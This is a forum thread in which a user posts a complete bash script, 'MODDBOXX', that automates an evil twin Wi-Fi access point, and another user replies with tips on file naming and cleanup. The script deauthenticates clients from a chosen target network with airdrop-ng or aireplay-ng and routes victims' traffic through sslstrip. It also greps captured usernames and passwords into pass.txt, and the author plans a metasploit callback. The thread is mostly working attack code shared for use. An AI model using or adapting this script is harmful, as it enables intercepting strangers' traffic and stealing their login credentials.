Seeking advice on my moddboxx port forwarding script

[lithiumr1]

The object of this script is to automate running an evil access point (ie MODDBOXX). You connect your ethernet port to the WAN port on your ap and then moddboxx......
1. Sets up dhcp for WAN port of the ap (works)
2. Changes your wlan0 mac address (works)
3. starts sslstrip / ettercap for mitm (sslstrip works great / ettercap not implemented yet)
4. starts radius server w/ an "evil" anon "Free Wifi" login prompt that connects back to metasploit (not finished yet)
5. opens various konsoles so that files / connections can be monitored in real time (works)
6. automates airdrop-ng to drop clients from other ap's (works okay on 1 card.. would be better with 2)

I had to move the script to the reply. It's almost too long for one post. Doh!

UPDATES:
1. Setting mac on iface to allow a static entry in airdrop's droprules.conf works now

2. Fixed airdrop. If we set airodump on 1 channel and then run airdrop -s 30 (for every 30 seconds) it's enough to *encourage* clients to connect without overloading the card so we can still have internet access. Would be MUCH better with two cards I think but it functions on just one. The script would have to be edited to allow for two cards.

3. Added aireplay-ng to deauth clients as well. Currently it only runs once but I'm going to try to find a way to loop it where you can select target mac, send a few deauth packets, then select another mac, so on and so forth.

4. Tailing sslstrip so you can see info coming in. Still have NOT fixed grepping out the domain/username/password. Right now we grep out any secure posts, which sslstrip does on its own, but I wanted to set it up where as much info was captured as possible and important info was then grep/awk/sed into a separate txt file. It is actually pretty easy to read through the secure posts though. Still would like to refine it anyway.

5. Script checks to see if mon0 is already up. If yes then it does nothing, if no it enables monitor mode. This was a big deal because if you ran the script 2,3, or 4 times you'd end up with mon1,mon2, ect. and that was annoying.

Things I'm working on / need help with........

1. Trying to setup an http redirect or something where the first time a user logs on they have to go to a "accept terms and conditions page" and after they accept then they can access the WAN. Not really sure how to do that yet. Freeradius seems like it may be a solution however I'm not sure that it's really necessary.

2. The grep >> pass.txt needs to be refined. I have it set up where it logs logins and passwords but they are not assosiated so you kind of have to pick and match.... that needs some fixin.

3. Would like to set up a trap (I think it's a trap?) to rm any tmp files when the script exits. ex: droprulesmod.conf / tmp.txt

4. When airodump starts it appends a "0-1" to the end of the capture file... which is fine. What I'd like to do is have the script use the latest one for airdrop. It is currently static and just uses "capture-01.csv" but if this is the second time ( or 3rd 4th ect) that airodump has run in that dir moddboxx still uses "0-1" for airdrop.

5. Lots of other stuff I'd like to add that I'll get to eventually.

[lithiumr1]

Code:

#!/bin/bash
#moddboxx evil ap script
#script written by lithiumr1@gmail.com
clear
echo -e -n "\n \n"
echo -e -n "          :::::::::::::::::::::::::::::::::MODDBOXX:::::::::::::::::::::::::::::::::: \n"
echo -e -n "                               Script by LithiumR1 Copywrong 2010 \n"
echo -e -n "                                      Version .01 Beta \n \n"

echo -e -n "\n Interface to connect to the internet?: "
read -e IFNET

echo -n -e "\n Change mac for $IFNET (required for airdrop)? y/n: "
read -e IFNETMACCHANGE

if [ "$IFNETMACCHANGE" = "y" ]; then
echo -e -n "\n Changing mac for $IFNET ..............\n"
ifconfig $IFNET down
macchanger -m 00:11:22:33:44:55 $IFNET #this mac is static so that we can leave it in the allow list for airdrop
ifconfig $IFNET up
sleep 1
ifup wlan0 &
sleep 5
echo -e -n "\n If you were previously connected to the internet on $IFNET you may need to reconnect! \n"
fi

echo -n -e "\n Choose a number for deauth tool: \n 1. Airdrop-ng \n 2. Aireplay-ng  \n 3. Nothing \n :"
read -e DEAUTH

if [ "$DEAUTH" = "1" ]; then
airmon-ng |grep -Eo "mon0" > tmp.txt
read -e MON < tmp.txt
rm tmp.txt
echo -e -n "\n What interface for airodump?: "
read -e IFDUMP	

	if [ "$MON" = "mon0" ]; then
	echo -e -n "\n Monitor mode is already enabled on $IFDUMP \n"
	else
	echo -e -n "\n Enabling monitor mode......... \n"
	airmon-ng start $IFDUMP 
	fi

echo -e -n "\n Listing access points within range............. \n"
iwlist $IFDUMP scanning |grep -E "(ESSID|Address|Channel:)"
echo -e -n "\n What channel is the target ap on?: "
read -e CHANNEL
echo -e -n "\n What is the target ap's mac address?: "
read -e TMAC
echo -e -n "\n Creating rules for airdrop.......... \n"
touch droprulesmod.conf
echo "a/any|00:11:22:33:44:55" > droprulesmod.conf #this is why we set the static mac for wlan0 rather than --random
echo "d/$TMAC|any" >> droprulesmod.conf #I'd like to create a loop in another konsole that scans so you can add more target macs 

echo -e -n "\n Starting airodump on mon0..............\n"
konsole --noframe --notabbar --nomenubar --notoolbar -e airodump-ng -w capture -c $CHANNEL --output-format csv mon0 &
fi

if [ "$DEAUTH" = "2" ]; then
airmon-ng |grep -Eo "mon0" > tmp.txt
read -e MON < tmp.txt
rm tmp.txt
echo -e -n "\n What interface for airodump?: "
read -e IFDUMP	

	if [ "$MON" = "mon0" ]; then
	echo -e -n "\n Monitor mode is already enabled on $IFDUMP \n"
	else
	echo -e -n "\n Enabling monitor mode......... \n"
	airmon-ng start $IFDUMP 
	fi

echo -e -n "\n Listing access points within range............. \n"
iwlist $IFDUMP scanning |grep -E "(ESSID|Address|Channel:)"
echo -e -n "\n What channel is the target ap on?: "
read -e CHANNEL

echo -e -n "\n What is the target ap's mac address?: "
read -e TMAC

echo -e -n "\n Starting airodump on mon0..............\n"
konsole --noframe --notabbar --nomenubar --notoolbar -e airodump-ng -w capture -c $CHANNEL --output-format csv mon0 &
fi

echo -e -n "\n Start dhcp for eth0? y/n: "
read -e DHCP

if [ "$DHCP" = "y" ]; then
echo -e -n "\n Taking eth0 down...........\n"
ifconfig eth0 down
sleep 2

echo -e -n "\n Bringing eth0 back up............\n"
ifconfig eth0 up
sleep 1

echo -e -n "\n Setting ipaddress and netmask on eth0..........\n"
ifconfig eth0 10.0.0.1 netmask 255.255.255.0
sleep 1

echo -e -n "\n Starting dhcp for eth0................\n"
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
konsole --geometry 645x25+0+175 --noframe --notabbar --nomenubar --notoolbar -e dhcpd3 -d -f -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid &
sleep 1 #depends on how long it takes for your AP to get an IP.... mine is pretty fast

echo -e -n "\n Temporarily disabling routing............\n"
echo 0 > /proc/sys/net/ipv4/ip_forward

echo -e -n "\n Temporarily blocking all traffic................\n"
iptables -P OUTPUT DROP
iptables -P INPUT DROP
iptables -P FORWARD DROP

echo -e -n "\n Deleting/Flushing old iptables rules..............\n"
iptables -F
iptables -t nat -F
iptables -t mangle -F
iptables -X
sleep 1

echo -e -n "\n Setting default ALLOW policies..................\n"
iptables -P OUTPUT ACCEPT
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT

echo -e -n "\n Allowing local loopback [NEEDED?].................\n"
iptables -A INPUT -i lo -j ACCEPT

echo -e -n "\n Allowing pings [OPTIONAL].............\n"
iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT
iptables -A FORWARD -p icmp --icmp-type echo-request -j ACCEPT


############ STATE STUFF ############
echo -e -n "\n Accepting existing connections [NEEDED]................\n"
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
sleep 1

# Allow any new conections from internal network
# [ONLY NEEDED IF PORTS ARE NOT EXPLITLY FORWARDED BELOW]
#iptables -A INPUT -m state --state NEW -i eth0 -j ACCEPT
#####################################

echo -e -n "\n Setting externally accessable inbound services [OPTIONAL]...............\n"
echo -e -n " You may want to disable Bittorrent ports on large networks.\n"
iptables -A INPUT -p tcp --dport 44444 -m state --state NEW -j ACCEPT #SSH
iptables -A INPUT -p tcp -i wlan0 --dport 23232 -m state --state NEW -j ACCEPT #Bittorrent
iptables -A INPUT -p udp -i wlan0 --dport 23232 -m state --state NEW -j ACCEPT #Bittorrent

echo -e -n "\n Setting internal inbound services [OPTIONAL - DNS NEEDED]..............\n"
iptables -A INPUT -p udp -i eth0 --dport 53 -m state --state NEW -j ACCEPT #DNS cache
iptables -A INPUT -p tcp -i eth0 --dport 53 -m state --state NEW -j ACCEPT #DNS cache
iptables -A INPUT -p udp -i eth0 --dport 137:139 -m state --state NEW -j ACCEPT #SAMBA
iptables -A INPUT -p tcp -i eth0 --dport 445 -m state --state NEW -j ACCEPT #SAMBA

echo -e -n "\n Allowing forwarding of essential services..............\n"
iptables -A FORWARD -p tcp --dport 80 -j ACCEPT #WEB
iptables -A FORWARD -p tcp --dport 443 -j ACCEPT #HTTPS

echo -e -n "\n Setting masquerade on wlan0...............\n"
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

echo -e -n "\n Enabling ip_forwarding...............\n"
echo 1 > /proc/sys/net/ipv4/ip_forward

fi

echo -e -n "\n ::::::::::::::::Log into your AP and set the SSID to match the target ap:::::::::::::::\n"
echo -e -n " Press ENTER when you are done: "
read -e
echo -e -n "\n Choose your mitm tool: \n 1. Sslstrip \n 2. Ettercap (not there yet) \n 3. Nothing \n : "
read -e STRIPPERS1 #Yay for Strippers!! ;)

echo -e -n "\n Use urlsnarf? y/n: "
read -e URLSNARF

echo -e -n "\n Tcptrack is NOT installed on BT4 by default.\n"
echo -e -n " apt-get install tcptrack if you want it. \n"
echo -e -n " Use tcptrack? y/n: "
read -e TCPTRACK

if [ "$STRIPPERS1" = "1" ]; then
echo -e -n "\n Redirecting for sslstrip ;)...............\n"
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

echo -e -n "\n Starting sslstrip.............\n"
konsole --geometry 645x200+0+321 --noframe --notabbar --nomenubar --notoolbar -e sslstrip -a -l 8080 &
sleep 2

echo -e -n "\n Staring Tail to watch sslstrip.log (it's cool to watch stuff flow in)........... \n"
konsole --geometry 645x200+0+321 --noframe --notabbar --nomenubar --notoolbar -e tail -f -s 1 -v sslstrip.log &

echo -e -n "\n Logging *some* common passwords like facebook, gmail, ect. to pass.txt \n"
echo -e -n " Not all passwords will be logged to this file so you may wish to look manually. \n"
echo -e -n " If anyone has a better way to do this let me know!!!\n"
tail -f -s 1 -v sslstrip.log |grep -Eo "(user|login|pass|passwd|password|pwd)=[0-9A-z._-]*" >> pass.txt &
tail -f -s 1 -v sslstrip.log |grep -B 0 -A 1 "SECURE POST data" >> securepostdata.log &
fi

if [ "$STRIPPERS1" = "2" ]; then
echo -e -n "\n Sorry, I haven't added ettercap to the script yet :( \n" # But this is where it will go when I do!!
fi

if [ "$URLSNARF" = "y" ]; then
echo -e -n "\n Starting urlsnarf............ \n"
konsole --geometry 645x200+0+548 --noframe --notabbar --nomenubar --notoolbar -e urlsnarf -i eth0 &
fi

if [ "$TCPTRACK" = "y" ]; then
echo -n -e "\n Starting tcptrack.......... \n"
konsole --geometry 645x800+800+0 --noframe --notabbar --nomenubar --notoolbar -e tcptrack -i wlan0 &
fi

if [ "$DEAUTH" = "1" ]; then

echo -n -e "\n You really need 2 cards for this and airodump needs to have been running for a while. \n"

echo -n -e "\n Starting airdrop...... \n"
sleep 20
konsole --geometry 645x25+0+175 --noframe --notabbar --nomenubar --notoolbar -e airdrop-ng -i mon0 -t capture-01.csv -r droprulesmod.conf -s 30 &
sleep 5
ps -A |grep -Eo "airdrop-ng" > tmp.txt
read -e TMP < tmp.txt
rm tmp.txt
	if [ "$TMP" = "airdrop-ng" ]; then
	echo -e -n "\n Airdrop running \n"
	else
	echo -e -n "\n Airdrop failed... probably due to not having any client macs from airodump. \n You can try it manually in a few minutes. \n"
	fi
fi

if [ "$DEAUTH" = "2" ]; then
echo -e -n "\n Listing client macs............. \n"
cat capture-01.csv |grep -B 0 -A 25 "Station MAC"
echo -e -n "\n What is the client mac address to deauth?: "
read -e CMAC
echo -e -n "\n How many deauth packets would you like to send? "
read -e PCKNUM
aireplay-ng -a $TMAC -c $CMAC -0 $PCKNUM mon0
fi


echo -n -e "\n \n"
echo -n -e "        If you set up chilispot on your ap (I use dd wrt) don't forget to start SET!!\n"
echo -n -e "   :::::::::::::::::::::::MODDBOXX finished. Have a Great day!!!::::::::::::::::::::::::::::: \n"

[CKing]

Why not use the date instaed of capture for the name that airodump outputs? This would help organize as well if you wanted to keep the cap files for some reason.
It would look like:

Code:

NOW=$(date +"-%b-%d-%y-%H%M%S")
airodump-ng mon0 -w /tmpdirpath/$NOW

Then you can point airdrop to $NOW-01.csv

Your trap would look like:

Code:

trap cleanup INT
function cleanup ()
{	rm /tmpdirpath/filestodelete
	killall whatever is running
	airmon-ng stop mon0
	whatever else you want
	exit 1
}

Let me know if you figure out that redirect thing for a terms of use page im interested in seeing how that would work. I think airsnarf did something similar so you might wanna check out how that was written.